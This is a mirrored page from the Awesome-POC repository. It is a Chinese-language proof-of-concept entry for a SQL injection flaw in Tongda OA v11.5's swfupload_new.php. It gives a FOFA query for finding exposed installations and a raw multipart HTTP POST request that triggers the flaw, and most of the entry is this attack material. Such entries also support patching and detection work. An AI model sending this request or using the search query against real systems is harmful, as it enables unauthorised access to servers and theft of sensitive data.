admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/通达OA v11.5 swfupload_new.php SQL注入漏洞.md
Threekiii b7e3b03ac7 更新漏洞库:OA产品漏洞/
2022-05-20 15:57:09 +08:00

53 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 通达OA v11.5 swfupload_new.php SQL注入漏洞
## 漏洞描述
通达OA v11.5 swfupload_new.php 文件存在SQL注入漏洞攻击者通过漏洞可获取服务器敏感信息
## 漏洞影响
```
通达OA v11.5
```
## FOFA
```
app="TDXK-通达OA"
```
## 漏洞复现
登陆页面
![image-20220520154058320](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201540406.png)
发送请求包触发漏洞
```
POST /general/file_folder/swfupload_new.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 355
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
Accept-Encoding: gzip
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"
2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"
------------GFioQpMK0vv2--
```
![image-20220520154111741](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201541795.png)
Reference in New Issue View Git Blame Copy Permalink